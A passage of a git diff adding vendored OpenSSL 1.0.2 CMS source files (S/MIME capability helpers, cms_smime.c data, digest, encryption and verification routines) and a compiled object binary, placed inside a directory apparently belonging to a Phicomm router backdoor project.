+        X509_ALGOR_free(alg);
+        return 0;
+    }
+    return 1;
+}
+
+/* Check to see if a cipher exists and if so add S/MIME capabilities */
+
+static int cms_add_cipher_smcap(STACK_OF(X509_ALGOR) **sk, int nid, int arg)
+{
+    if (EVP_get_cipherbynid(nid))
+        return CMS_add_simple_smimecap(sk, nid, arg);
+    return 1;
+}
+
+static int cms_add_digest_smcap(STACK_OF(X509_ALGOR) **sk, int nid, int arg)
+{
+    if (EVP_get_digestbynid(nid))
+        return CMS_add_simple_smimecap(sk, nid, arg);
+    return 1;
+}
+
+int CMS_add_standard_smimecap(STACK_OF(X509_ALGOR) **smcap)
+{
+    if (!cms_add_cipher_smcap(smcap, NID_aes_256_cbc, -1)
+        || !cms_add_digest_smcap(smcap, NID_id_GostR3411_94, -1)
+        || !cms_add_cipher_smcap(smcap, NID_id_Gost28147_89, -1)
+        || !cms_add_cipher_smcap(smcap, NID_aes_192_cbc, -1)
+        || !cms_add_cipher_smcap(smcap, NID_aes_128_cbc, -1)
+        || !cms_add_cipher_smcap(smcap, NID_des_ede3_cbc, -1)
+        || !cms_add_cipher_smcap(smcap, NID_rc2_cbc, 128)
+        || !cms_add_cipher_smcap(smcap, NID_rc2_cbc, 64)
+        || !cms_add_cipher_smcap(smcap, NID_des_cbc, -1)
+        || !cms_add_cipher_smcap(smcap, NID_rc2_cbc, 40))
+        return 0;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_sd.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_sd.o
new file mode 100644
index 0000000000000000000000000000000000000000..efe6235e153e5f06c49460e11ad49c07281a1a04
GIT binary patch
literal 18136
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
PUL`Bt#p=>!e*OOf1f8mp

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_smime.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_smime.c
new file mode 100644
index 0000000..8729e3f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_smime.c
@@ -0,0 +1,835 @@
+/* crypto/cms/cms_smime.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#include <openssl/err.h>
+#include <openssl/cms.h>
+#include "cms_lcl.h"
+#include "asn1_locl.h"
+
+static int cms_copy_content(BIO *out, BIO *in, unsigned int flags)
+{
+    unsigned char buf[4096];
+    int r = 0, i;
+    BIO *tmpout = NULL;
+
+    if (out == NULL)
+        tmpout = BIO_new(BIO_s_null());
+    else if (flags & CMS_TEXT) {
+        tmpout = BIO_new(BIO_s_mem());
+        BIO_set_mem_eof_return(tmpout, 0);
+    } else
+        tmpout = out;
+
+    if (!tmpout) {
+        CMSerr(CMS_F_CMS_COPY_CONTENT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    /* Read all content through chain to process digest, decrypt etc */
+    for (;;) {
+        i = BIO_read(in, buf, sizeof(buf));
+        if (i <= 0) {
+            if (BIO_method_type(in) == BIO_TYPE_CIPHER) {
+                if (!BIO_get_cipher_status(in))
+                    goto err;
+            }
+            if (i < 0)
+                goto err;
+            break;
+        }
+
+        if (tmpout && (BIO_write(tmpout, buf, i) != i))
+            goto err;
+    }
+
+    if (flags & CMS_TEXT) {
+        if (!SMIME_text(tmpout, out)) {
+            CMSerr(CMS_F_CMS_COPY_CONTENT, CMS_R_SMIME_TEXT_ERROR);
+            goto err;
+        }
+    }
+
+    r = 1;
+
+ err:
+    if (tmpout && (tmpout != out))
+        BIO_free(tmpout);
+    return r;
+
+}
+
+static int check_content(CMS_ContentInfo *cms)
+{
+    ASN1_OCTET_STRING **pos = CMS_get0_content(cms);
+    if (!pos || !*pos) {
+        CMSerr(CMS_F_CHECK_CONTENT, CMS_R_NO_CONTENT);
+        return 0;
+    }
+    return 1;
+}
+
+static void do_free_upto(BIO *f, BIO *upto)
+{
+    if (upto) {
+        BIO *tbio;
+        do {
+            tbio = BIO_pop(f);
+            BIO_free(f);
+            f = tbio;
+        }
+        while (f != upto);
+    } else
+        BIO_free_all(f);
+}
+
+int CMS_data(CMS_ContentInfo *cms, BIO *out, unsigned int flags)
+{
+    BIO *cont;
+    int r;
+    if (OBJ_obj2nid(CMS_get0_type(cms)) != NID_pkcs7_data) {
+        CMSerr(CMS_F_CMS_DATA, CMS_R_TYPE_NOT_DATA);
+        return 0;
+    }
+    cont = CMS_dataInit(cms, NULL);
+    if (!cont)
+        return 0;
+    r = cms_copy_content(out, cont, flags);
+    BIO_free_all(cont);
+    return r;
+}
+
+CMS_ContentInfo *CMS_data_create(BIO *in, unsigned int flags)
+{
+    CMS_ContentInfo *cms;
+    cms = cms_Data_create();
+    if (!cms)
+        return NULL;
+
+    if ((flags & CMS_STREAM) || CMS_final(cms, in, NULL, flags))
+        return cms;
+
+    CMS_ContentInfo_free(cms);
+
+    return NULL;
+}
+
+int CMS_digest_verify(CMS_ContentInfo *cms, BIO *dcont, BIO *out,
+                      unsigned int flags)
+{
+    BIO *cont;
+    int r;
+    if (OBJ_obj2nid(CMS_get0_type(cms)) != NID_pkcs7_digest) {
+        CMSerr(CMS_F_CMS_DIGEST_VERIFY, CMS_R_TYPE_NOT_DIGESTED_DATA);
+        return 0;
+    }
+
+    if (!dcont && !check_content(cms))
+        return 0;
+
+    cont = CMS_dataInit(cms, dcont);
+    if (!cont)
+        return 0;
+    r = cms_copy_content(out, cont, flags);
+    if (r)
+        r = cms_DigestedData_do_final(cms, cont, 1);
+    do_free_upto(cont, dcont);
+    return r;
+}
+
+CMS_ContentInfo *CMS_digest_create(BIO *in, const EVP_MD *md,
+                                   unsigned int flags)
+{
+    CMS_ContentInfo *cms;
+    if (!md)
+        md = EVP_sha1();
+    cms = cms_DigestedData_create(md);
+    if (!cms)
+        return NULL;
+
+    if (!(flags & CMS_DETACHED))
+        CMS_set_detached(cms, 0);
+
+    if ((flags & CMS_STREAM) || CMS_final(cms, in, NULL, flags))
+        return cms;
+
+    CMS_ContentInfo_free(cms);
+    return NULL;
+}
+
+int CMS_EncryptedData_decrypt(CMS_ContentInfo *cms,
+                              const unsigned char *key, size_t keylen,
+                              BIO *dcont, BIO *out, unsigned int flags)
+{
+    BIO *cont;
+    int r;
+    if (OBJ_obj2nid(CMS_get0_type(cms)) != NID_pkcs7_encrypted) {
+        CMSerr(CMS_F_CMS_ENCRYPTEDDATA_DECRYPT,
+               CMS_R_TYPE_NOT_ENCRYPTED_DATA);
+        return 0;
+    }
+
+    if (!dcont && !check_content(cms))
+        return 0;
+
+    if (CMS_EncryptedData_set1_key(cms, NULL, key, keylen) <= 0)
+        return 0;
+    cont = CMS_dataInit(cms, dcont);
+    if (!cont)
+        return 0;
+    r = cms_copy_content(out, cont, flags);
+    do_free_upto(cont, dcont);
+    return r;
+}
+
+CMS_ContentInfo *CMS_EncryptedData_encrypt(BIO *in, const EVP_CIPHER *cipher,
+                                           const unsigned char *key,
+                                           size_t keylen, unsigned int flags)
+{
+    CMS_ContentInfo *cms;
+    if (!cipher) {
+        CMSerr(CMS_F_CMS_ENCRYPTEDDATA_ENCRYPT, CMS_R_NO_CIPHER);
+        return NULL;
+    }
+    cms = CMS_ContentInfo_new();
+    if (!cms)
+        return NULL;
+    if (!CMS_EncryptedData_set1_key(cms, cipher, key, keylen))
+        return NULL;
+
+    if (!(flags & CMS_DETACHED))
+        CMS_set_detached(cms, 0);
+
+    if ((flags & (CMS_STREAM | CMS_PARTIAL))
+        || CMS_final(cms, in, NULL, flags))
+        return cms;
+
+    CMS_ContentInfo_free(cms);
+    return NULL;
+}
+
+static int cms_signerinfo_verify_cert(CMS_SignerInfo *si,
+                                      X509_STORE *store,
+                                      STACK_OF(X509) *certs,
+                                      STACK_OF(X509_CRL) *crls,
+                                      unsigned int flags)
+{
+    X509_STORE_CTX ctx;
+    X509 *signer;
+    int i, j, r = 0;
+    CMS_SignerInfo_get0_algs(si, NULL, &signer, NULL, NULL);
+    if (!X509_STORE_CTX_init(&ctx, store, signer, certs)) {
+        CMSerr(CMS_F_CMS_SIGNERINFO_VERIFY_CERT, CMS_R_STORE_INIT_ERROR);
+        goto err;
+    }
+    X509_STORE_CTX_set_default(&ctx, "smime_sign");
+    if (crls)
+        X509_STORE_CTX_set0_crls(&ctx, crls);
+
+    i = X509_verify_cert(&ctx);
+    if (i <= 0) {
+        j = X509_STORE_CTX_get_error(&ctx);
+        CMSerr(CMS_F_CMS_SIGNERINFO_VERIFY_CERT,
+               CMS_R_CERTIFICATE_VERIFY_ERROR);
+        ERR_add_error_data(2, "Verify error:",
+                           X509_verify_cert_error_string(j));
+        goto err;
+    }
+    r = 1;
+ err:
+    X509_STORE_CTX_cleanup(&ctx);
+    return r;
+
+}
+
+int CMS_verify(CMS_ContentInfo *cms, STACK_OF(X509) *certs,
+               X509_STORE *store, BIO *dcont, BIO *out, unsigned int flags)
+{
+    CMS_SignerInfo *si;
+    STACK_OF(CMS_SignerInfo) *sinfos;
+    STACK_OF(X509) *cms_certs = NULL;
+    STACK_OF(X509_CRL) *crls = NULL;
+    X509 *signer;
+    int i, scount = 0, ret = 0;
+    BIO *cmsbio = NULL, *tmpin = NULL;
+
+    if (!dcont && !check_content(cms))
+        return 0;
+
+    /* Attempt to find all signer certificates */
+
+    sinfos = CMS_get0_SignerInfos(cms);
+
+    if (sk_CMS_SignerInfo_num(sinfos) <= 0) {
+        CMSerr(CMS_F_CMS_VERIFY, CMS_R_NO_SIGNERS);
+        goto err;
+    }
+
+    for (i = 0; i < sk_CMS_SignerInfo_num(sinfos); i++) {
+        si = sk_CMS_SignerInfo_value(sinfos, i);
+        CMS_SignerInfo_get0_algs(si, NULL, &signer, NULL, NULL);
+        if (signer)
+            scount++;
+    }
+
+    if (scount != sk_CMS_SignerInfo_num(sinfos))
+        scount += CMS_set1_signers_certs(cms, certs, flags);
+
+    if (scount != sk_CMS_SignerInfo_num(sinfos)) {
